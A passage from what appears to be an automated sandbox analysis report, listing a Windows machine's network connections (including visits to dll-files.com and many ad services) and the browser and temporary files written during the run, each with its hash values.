| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| IE | 23.216.155.139:443 | th.bing.com | udp |
| IE | 23.216.155.170:443 | r.bing.com | udp |
| IE | 23.216.155.139:443 | th.bing.com | udp |
| US | 8.8.8.8:53 | rewards.bing.com | udp |
| US | 8.8.8.8:53 | rewards.bing.com | udp |
| US | 150.171.27.10:443 | rewards.bing.com | tcp |
| RU | 109.248.203.81:21 | | tcp |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| NL | 40.126.32.74:443 | login.microsoftonline.com | tcp |
| US | 8.8.8.8:53 | www.dll-files.com | udp |
| US | 8.8.8.8:53 | www.dll-files.com | udp |
| GB | 79.127.237.132:443 | www.dll-files.com | tcp |
| GB | 79.127.237.132:443 | www.dll-files.com | tcp |
| US | 8.8.8.8:53 | www.dll-files.com | udp |
| US | 8.8.8.8:53 | www.dll-files.com | udp |
| US | 8.8.8.8:53 | maxcdn.bootstrapcdn.com | udp |
| US | 8.8.8.8:53 | maxcdn.bootstrapcdn.com | udp |
| US | 8.8.8.8:53 | ajax.googleapis.com | udp |
| US | 8.8.8.8:53 | ajax.googleapis.com | udp |
| US | 104.18.11.207:443 | maxcdn.bootstrapcdn.com | udp |
| GB | 142.250.179.234:443 | ajax.googleapis.com | tcp |
| GB | 142.250.179.234:443 | ajax.googleapis.com | tcp |
| US | 8.8.8.8:53 | www.dll-files.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | maxcdn.bootstrapcdn.com | udp |
| US | 8.8.8.8:53 | maxcdn.bootstrapcdn.com | udp |
| GB | 142.250.179.226:443 | googleads.g.doubleclick.net | udp |
| US | 104.18.10.207:443 | maxcdn.bootstrapcdn.com | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| GB | 172.217.169.46:443 | fundingchoicesmessages.google.com | tcp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| GB | 172.217.169.46:443 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 216.239.32.36:443 | region1.analytics.google.com | tcp |
| BE | 64.233.166.157:443 | stats.g.doubleclick.net | tcp |
| GB | 142.250.178.3:443 | www.google.co.uk | udp |
| US | 8.8.8.8:53 | lh3.googleusercontent.com | udp |
| US | 8.8.8.8:53 | lh3.googleusercontent.com | udp |
| US | 8.8.8.8:53 | lh3.googleusercontent.com | udp |
| US | 8.8.8.8:53 | lh3.googleusercontent.com | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| GB | 142.250.187.225:443 | lh3.googleusercontent.com | tcp |
| GB | 172.217.169.46:443 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | www.dll-files.com | udp |
| US | 8.8.8.8:53 | www.dll-files.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| GB | 142.250.179.226:443 | googleads.g.doubleclick.net | udp |
| GB | 142.250.179.226:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| GB | 172.217.169.34:443 | ep1.adtrafficquality.google | tcp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | ads.eu.criteo.com | udp |
| US | 8.8.8.8:53 | ads.eu.criteo.com | udp |
| US | 8.8.8.8:53 | rtb.fr3.eu.criteo.com | udp |
| US | 8.8.8.8:53 | rtb.fr3.eu.criteo.com | udp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | tcp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | tcp |
| NL | 178.250.1.17:443 | ads.eu.criteo.com | tcp |
| NL | 178.250.1.17:443 | ads.eu.criteo.com | tcp |
| NL | 178.250.1.17:443 | ads.eu.criteo.com | tcp |
| FR | 178.250.7.12:443 | rtb.fr3.eu.criteo.com | tcp |
| FR | 178.250.7.12:443 | rtb.fr3.eu.criteo.com | tcp |
| US | 8.8.8.8:53 | ads.eu.criteo.com | udp |
| US | 8.8.8.8:53 | ads.eu.criteo.com | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ads.eu.criteo.com | udp |
| US | 8.8.8.8:53 | ads.eu.criteo.com | udp |
| US | 8.8.8.8:53 | static.criteo.net | udp |
| US | 8.8.8.8:53 | static.criteo.net | udp |
| US | 8.8.8.8:53 | cat.nl3.eu.criteo.com | udp |
| US | 8.8.8.8:53 | cat.nl3.eu.criteo.com | udp |
| US | 8.8.8.8:53 | measurement-api.criteo.com | udp |
| US | 8.8.8.8:53 | measurement-api.criteo.com | udp |
| GB | 142.250.180.1:443 | ep2.adtrafficquality.google | tcp |
| NL | 178.250.1.17:443 | ads.eu.criteo.com | tcp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| NL | 178.250.1.6:443 | cat.nl3.eu.criteo.com | tcp |
| NL | 178.250.1.39:443 | static.criteo.net | tcp |
| NL | 178.250.1.39:443 | static.criteo.net | tcp |
| NL | 178.250.1.39:443 | static.criteo.net | tcp |
| NL | 178.250.1.39:443 | static.criteo.net | tcp |
| NL | 178.250.1.24:443 | measurement-api.criteo.com | tcp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | csm.eu.criteo.net | udp |
| US | 8.8.8.8:53 | csm.eu.criteo.net | udp |
| NL | 178.250.1.39:443 | static.criteo.net | tcp |
| NL | 178.250.1.39:443 | static.criteo.net | tcp |
| US | 8.8.8.8:53 | imageproxy.eu.criteo.net | udp |
| US | 8.8.8.8:53 | imageproxy.eu.criteo.net | udp |
| NL | 178.250.1.6:443 | cat.nl3.eu.criteo.com | tcp |
| NL | 178.250.1.15:443 | imageproxy.eu.criteo.net | tcp |
| NL | 178.250.1.15:443 | imageproxy.eu.criteo.net | tcp |
| NL | 178.250.1.15:443 | imageproxy.eu.criteo.net | tcp |
| NL | 178.250.1.15:443 | imageproxy.eu.criteo.net | tcp |
| NL | 178.250.1.25:443 | csm.eu.criteo.net | tcp |
| US | 8.8.8.8:53 | rtb.fr3.eu.criteo.com | udp |
| US | 8.8.8.8:53 | rtb.fr3.eu.criteo.com | udp |
| NL | 178.250.1.15:443 | imageproxy.eu.criteo.net | tcp |
| NL | 178.250.1.15:443 | imageproxy.eu.criteo.net | tcp |
| NL | 178.250.1.25:443 | csm.eu.criteo.net | tcp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| GB | 142.250.180.1:443 | ep2.adtrafficquality.google | tcp |
| NL | 178.250.1.39:443 | static.criteo.net | tcp |
| US | 8.8.8.8:53 | csm.eu.criteo.net | udp |
| US | 8.8.8.8:53 | csm.eu.criteo.net | udp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| GB | 142.250.180.1:443 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| GB | 216.58.204.66:443 | ep1.adtrafficquality.google | udp |
| FR | 51.77.7.204:443 | | tcp |
| FR | 51.77.7.204:443 | | tcp |
| US | 8.8.8.8:53 | csm.eu.criteo.net | udp |
| US | 8.8.8.8:53 | csm.eu.criteo.net | udp |
| US | 8.8.8.8:53 | www.dll-files.com | udp |
| US | 8.8.8.8:53 | www.dll-files.com | udp |
| US | 8.8.8.8:53 | csm.eu.criteo.net | udp |
| US | 8.8.8.8:53 | csm.eu.criteo.net | udp |
| US | 8.8.8.8:53 | maxcdn.bootstrapcdn.com | udp |
| US | 8.8.8.8:53 | maxcdn.bootstrapcdn.com | udp |
| US | 8.8.8.8:53 | ajax.googleapis.com | udp |
| US | 8.8.8.8:53 | ajax.googleapis.com | udp |
| GB | 172.217.169.42:443 | ajax.googleapis.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | ads.eu.criteo.com | udp |
| US | 8.8.8.8:53 | ads.eu.criteo.com | udp |
| US | 8.8.8.8:53 | rtb.fr3.eu.criteo.com | udp |
| US | 8.8.8.8:53 | rtb.fr3.eu.criteo.com | udp |
| US | 8.8.8.8:53 | cat.nl3.eu.criteo.com | udp |
| US | 8.8.8.8:53 | cat.nl3.eu.criteo.com | udp |
| US | 8.8.8.8:53 | measurement-api.criteo.com | udp |
| US | 8.8.8.8:53 | measurement-api.criteo.com | udp |
| US | 8.8.8.8:53 | client-side-metrics.eu.criteo.net | udp |
| US | 8.8.8.8:53 | imageproxy.eu.criteo.net | udp |
| US | 8.8.8.8:53 | imageproxy.eu.criteo.net | udp |
| NL | 178.250.1.54:443 | client-side-metrics.eu.criteo.net | tcp |
| US | 8.8.8.8:53 | csm.eu.criteo.net | udp |
| US | 8.8.8.8:53 | csm.eu.criteo.net | udp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| GB | 216.58.213.2:443 | ep1.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | client-side-metrics.eu.criteo.net | udp |
| US | 8.8.8.8:53 | client-side-metrics.eu.criteo.net | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 216.239.32.36:443 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | www.dll-files.com | udp |
| US | 8.8.8.8:53 | www.dll-files.com | udp |
| US | 8.8.8.8:53 | rtb.fr3.eu.criteo.com | udp |
| US | 8.8.8.8:53 | rtb.fr3.eu.criteo.com | udp |
| US | 8.8.8.8:53 | imageproxy.eu.criteo.net | udp |
| US | 8.8.8.8:53 | imageproxy.eu.criteo.net | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | csm.eu.criteo.net | udp |
| US | 8.8.8.8:53 | csm.eu.criteo.net | udp |
| US | 8.8.8.8:53 | client-side-metrics.eu.criteo.net | udp |
| US | 8.8.8.8:53 | client-side-metrics.eu.criteo.net | udp |
| US | 8.8.8.8:53 | maxcdn.bootstrapcdn.com | udp |
| US | 8.8.8.8:53 | maxcdn.bootstrapcdn.com | udp |
| NL | 178.250.1.54:443 | client-side-metrics.eu.criteo.net | tcp |
| US | 8.8.8.8:53 | ajax.googleapis.com | udp |
| NL | 178.250.1.54:443 | client-side-metrics.eu.criteo.net | tcp |
| US | 8.8.8.8:53 | maxcdn.bootstrapcdn.com | udp |
| US | 8.8.8.8:53 | maxcdn.bootstrapcdn.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | connect.facebook.net | udp |
| US | 8.8.8.8:53 | connect.facebook.net | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 163.70.147.23:443 | connect.facebook.net | udp |
| GB | 163.70.147.23:443 | connect.facebook.net | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| IE | 31.13.73.35:443 | www.facebook.com | udp |
| IE | 31.13.73.35:443 | www.facebook.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 104.18.11.207:443 | maxcdn.bootstrapcdn.com | udp |
| GB | 216.58.201.98:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| GB | 142.250.179.226:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | ads.eu.criteo.com | udp |
| US | 8.8.8.8:53 | ads.eu.criteo.com | udp |
| FR | 178.250.7.12:443 | rtb.fr3.eu.criteo.com | tcp |
| NL | 178.250.1.17:443 | ads.eu.criteo.com | tcp |
| NL | 178.250.1.17:443 | ads.eu.criteo.com | tcp |
| NL | 178.250.1.17:443 | ads.eu.criteo.com | tcp |
| US | 8.8.8.8:53 | cat.nl3.eu.criteo.com | udp |
| US | 8.8.8.8:53 | cat.nl3.eu.criteo.com | udp |
| US | 8.8.8.8:53 | measurement-api.criteo.com | udp |
| US | 8.8.8.8:53 | measurement-api.criteo.com | udp |
| NL | 178.250.1.6:443 | cat.nl3.eu.criteo.com | tcp |
| NL | 178.250.1.24:443 | measurement-api.criteo.com | tcp |
| NL | 178.250.1.25:443 | csm.eu.criteo.net | tcp |
| NL | 178.250.1.15:443 | imageproxy.eu.criteo.net | tcp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| US | 8.8.8.8:53 | download.zip.dll-files.com | udp |
| FR | 143.244.56.58:443 | download.zip.dll-files.com | tcp |
| FR | 143.244.56.58:443 | download.zip.dll-files.com | tcp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| IT | 2.18.255.68:443 | www.bing.com | udp |
| IT | 2.18.255.68:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| IT | 2.18.255.93:443 | r.bing.com | udp |
| IT | 2.18.255.93:443 | r.bing.com | udp |
| IT | 2.18.255.115:443 | th.bing.com | udp |
| IT | 2.18.255.115:443 | th.bing.com | udp |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| CA | 69.50.175.178:80 | | tcp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| GB | 2.18.27.82:443 | www.bing.com | tcp |
| CA | 69.50.175.178:80 | | tcp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 6eac9d05429a9358b608d44d94784e10 |
| SHA1 | 73395ed98fee0a7a2f8585c37a8811bd8837585d |
| SHA256 | 0bf0ae5a65a11d2714b2ac12a424cd38ed0a8b7e7530ec59362786b1a832eb60 |
| SHA512 | 235731c2c6a85f6ada201f4e4c061ce7db201a2e82c04334a5bfcbfdba60f9ac1b99a06e9ac1e9bbea1651b16747fa4e44f68f6882a960671b6b613f51213c18 |
\??\pipe\crashpad_4936_KJZHPWNWOOTLXDJW
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | a7bd3d5922ae81414e7944b805a7d35a |
| SHA1 | e46d09db68c10c1fa46f3e38f65ab8263bcebc5c |
| SHA256 | bf1e815460636c7eedf53bcf4ce784779c762d894954dc17c5fd6cec76a13695 |
| SHA512 | d14a13dddf68d10b0f593ae574e8e80c53e62ca6cf873c730ae34c87a434c1caa74bfa0ce8789ab050beabfa80d323c5dad416cc28c7fb169f9e664f1c2ce030 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | cf1d30ca2332aa18881b260bba9417f1 |
| SHA1 | a8dc7686399154740a107526f533f6ecdb071137 |
| SHA256 | 5fb81b7f6083c821a5f8e1e3ff9783dd3d808bb5a7edcac8ad94441a6c101824 |
| SHA512 | c6c07d6593dd645640165a5e76b7662d5af298f9a3781c44950b9bf330cb4f58d0939624625148c3bd90e13acf563f6c55091e27ed7f55ffe31545f2ca1b3d9b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 3913928d36a204b8c7a09f9664615308 |
| SHA1 | 6f5a2afcf7d4f9ba5d201c4575ee7ea5cbc904bc |
| SHA256 | 5cd63a20006de4c006a47a6b3a922a53b15bda4fbfd14e77b8a5416583c8f9b9 |
| SHA512 | 25f2410c171fb2c64bd4a3706a3a3b5de6f694cbebe555cc223996fd3a16d346737594d4cc09a737484d8a5e3a0ea33e0705ac60481b51857bdb3127a7996145 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico
| MD5 | 164a788f50529fc93a6077e50675c617 |
| SHA1 | c53f6cd0531fd98d6abbd2a9e5fbb4319b221f48 |
| SHA256 | b305e470fb9f8b69a8cd53b5a8ffb88538c9f6a9c7c2c194a226e8f6c9b53c17 |
| SHA512 | ec7d173b55283f3e59a468a0037921dc4e1bf3fab1c693330b9d8e5826273c917b374c4b802f3234bbb5e5e210d55e52351426867e0eb8c9f6fba1a053cb05d4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres
| MD5 | 9909f25844a1ac13b891bf462008cc5a |
| SHA1 | 62a89cf9811ec7836d31ae1cfcadeea40d449262 |
| SHA256 | 30f323427ba600b0f21e8688973f0521d909ae20004238a4b37a8af67892af88 |
| SHA512 | abb2b081701327aef555d5ece7d883473bb604ac92e6d94986f26d12a348a35ff9c2d06de93aa746b6f7ed3fa6ced66366882c73172315c2e7503cd82c40d782 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log
| MD5 | a025da0ebcf89247ff9b629cf9102d84 |
| SHA1 | 6edb404e1e926439e927c76de4797fa4e39100b3 |
| SHA256 | 6a987bcb93b542e404cdb5996a911a818e3ac3c9fcd9fa5e0903a16f137bc21e |
| SHA512 | 9880b122b449fcf43609991ba8bfe0c1acb271a654d20ebb9e59ed96e11efd89ae034acd939c49e0fbb798a41195282e56f5cc1e6387362de0deb863f242499a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Temp\scoped_dir4936_847988428\6eeca731-58f6-454b-b9a0-9b69c3cd474f.tmp
| MD5 | cc05ed3e66468e692745ba6563c69740 |
| SHA1 | eae9dbd4d36aa91fd43f7d452ac3d252b103759d |
| SHA256 | fb1311fb7142825abacb3c7aedddf948f5c9b258e447c953ce0f7f4b19c6dfff |
| SHA512 | 4b527db02d6ea36b914558a3e44fd3d15772bf2be4ba0a640bf70427af07dcde5ed6967930cc3624a244cfc82290f125eea2754812586216b3d5a37757ce8db4 |
C:\Users\Admin\AppData\Local\Temp\090c6243-2cb7-4625-badf-088de9eebab7.tmp
| MD5 | 5058f1af8388633f609cadb75a75dc9d |
| SHA1 | 3a52ce780950d4d969792a2559cd519d7ee8c727 |
| SHA256 | cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8 |
| SHA512 | 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21 |
C:\Users\Admin\AppData\Local\Temp\76624c06-9455-46b1-831c-65bc5339ed29.tmp
| MD5 | 78e47dda17341bed7be45dccfd89ac87 |
| SHA1 | 1afde30e46997452d11e4a2adbbf35cce7a1404f |
| SHA256 | 67d161098be68cd24febc0c7b48f515f199dda72f20ae3bbb97fcf2542bb0550 |
| SHA512 | 9574a66d3756540479dc955c4057144283e09cae11ce11ebce801053bb48e536e67dc823b91895a9e3ee8d3cb27c065d5e9030c39a26cbf3f201348385b418a5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps
| MD5 | 06d55006c2dec078a94558b85ae01aef |
| SHA1 | 6a9b33e794b38153f67d433b30ac2a7cf66761e6 |
| SHA256 | 088bb586f79dd99c5311d14e1560bbe0bb56225a1b4432727d2183341c762bcd |
| SHA512 | ec190652af9c213ccbb823e69c21d769c64e3b9bae27bea97503c352163bf70f93c67cebbf327bfc73bfd632c9a3ae57283b6e4019af04750fe18a2410a68e60 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist
| MD5 | d11d7533c72bb4f2e791d05650a45e2e |
| SHA1 | eb1383e1d99a1c78ce2721fee15043eb7d498f63 |
| SHA256 | 3d7124bd67434b44501704e52f34ba05d545541b01335cf5fbbcefde11703ba5 |
| SHA512 | 52188a97e95b96b4ae1c219baead33cd56b84ebc82131fbb7312c379d4d847944491f42e17def5a22351796c1f4eadcbe66455162207c888eb93e7fdb1b46d71 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_1\content.js
| MD5 | 3d20584f7f6c8eac79e17cca4207fb79 |
| SHA1 | 3c16dcc27ae52431c8cdd92fbaab0341524d3092 |
| SHA256 | 0d40a5153cb66b5bde64906ca3ae750494098f68ad0b4d091256939eea243643 |
| SHA512 | 315d1b4cc2e70c72d7eb7d51e0f304f6e64ac13ae301fd2e46d585243a6c936b2ad35a0964745d291ae9b317c316a29760b9b9782c88cc6a68599db531f87d59 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | c5e635cdb0e61c5e4c7203669f195a68 |
| SHA1 | 04eb8119bae584e6802f3d269f17000b86ed4f19 |
| SHA256 | 11ccb733e7f7238fd2d95c4e15f8c409923975fa18e24cd37aa4428b7830fbe4 |
| SHA512 | 534d14b0354566128f5ce1c16a2168975273ccea36420fe4816b7ae9b48d13e1852995aed68b2e534430079f69fa1098c864727c6801067213c2e07b7f342453 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | 65e997c55db45b534d70d9024d14def1 |
| SHA1 | 0962b3269c79e1d2e647cfac3e11f195f233ce38 |
| SHA256 | 9d65e4ad5d0b08bc3ddd38588e0e16565b94938f3c8584391f2464dffdfa9f0f |
| SHA512 | 38bf81e0bab3a25f4a7eb01d309e6691ae9a0df507c633dc94305103d369733bfc1546abee7a0d3324104c96e9e86cd954d230b5aa97c61844422e013ac410f6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 84614b13d358af20a58da2b2e90b671e |
| SHA1 | b3ccb056457d2c2bf7639372dbcecd5e5b9f29e0 |
| SHA256 | 72e1fe9dc4e6990cfd9636823254eba771fcaa03d35a1c53d20c9427cf5bece1 |
| SHA512 | b8b29b202bf68e8b1a1b97d2e7c11497eeaa46401998eb9fb09f074a2b144234ea9d4f9692c8d1abe09cde06b71c475cdf88ac5e7858d69955d5508f9bd79d49 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | 285252a2f6327d41eab203dc2f402c67 |
| SHA1 | acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6 |
| SHA256 | 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026 |
| SHA512 | 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\863b841d-5c10-44d3-99ed-2b9af6f19ec0\index-dir\the-real-index~RFe578c13.TMP
| MD5 | acc0238398e33ea10f4ba5cc651860b9 |
| SHA1 | 1cbdcd9511c38d8e1b4ba5972a71d6ed15ab749e |
| SHA256 | 1a40b8594e30215b08ba2f1b597130f1a7f405b36977bdea732609e127c94416 |
| SHA512 | dd6836e8b76494027f20d02c5ddc2135c86eca379fa0fd0c939cd4dfc8736c51fc5031628b2cdab7fb673cd210391a5c3d36a304635ab6be597422ba41401686 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\863b841d-5c10-44d3-99ed-2b9af6f19ec0\index-dir\the-real-index
| MD5 | bf3bba0d5b278b7276367a6acd394ce6 |
| SHA1 | 74ce01e356fc234decf50b358cf1a8c5b7ae6865 |
| SHA256 | b94292449f57a5d2250e3d9b11748bdb946a6b89847a5a2daa392667babe57ec |
| SHA512 | 47b9d67b907d574e7aa982a9500a15ddd6cd934e087543fe15f0b58a6e6b1bca201fd8edd3774954c5bce4915395de356d72fd38c4698dc7bf1f8c4d2648cef4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter
| MD5 | aa09337019e09f44c09d1951e82f26d8 |
| SHA1 | 38bd6301adfe6e248d3570a43e78be875b0493ca |
| SHA256 | 222dc494fa24b738863ab79c9db5a9901c721ab802c9a88ea45c59fc0c2b8468 |
| SHA512 | 148f614ebdb9cb4a307e7dd2ae445ae44414b078e027f10faf37900d1787b5ca652de2559f5985ccb0609aff66cb22ca6182fb9dddc0e1b6934a353e35d1d034 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter~RFe57d4e4.TMP
| MD5 | ea05c6b44fbc6cef0216798e455c60a2 |
| SHA1 | 9ef3efbd93cb53f324c31a76563f7c0e1abeb747 |
| SHA256 | f5ba5e1582687fc1da53257a2be9ecda811061bffe5d41e02233e118bc43ac47 |
| SHA512 | 0a96cde7e8ba6434c54c9ce20771beb2173422c29cc440d11fb6c3a907793a9d147dbcc3ff9a240c2adfcf87355c3d96f012576f5bd8c301702cdfa88142a844 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 7ae766bc26dd294f838e6edb5b5c9e36 |
| SHA1 | de0fd07fa49709c762129db80b80d0cd449d3971 |
| SHA256 | 79d06c6f75c3309c8d2ad55715036adb0f5b06a05597294056b197211c60c9ae |
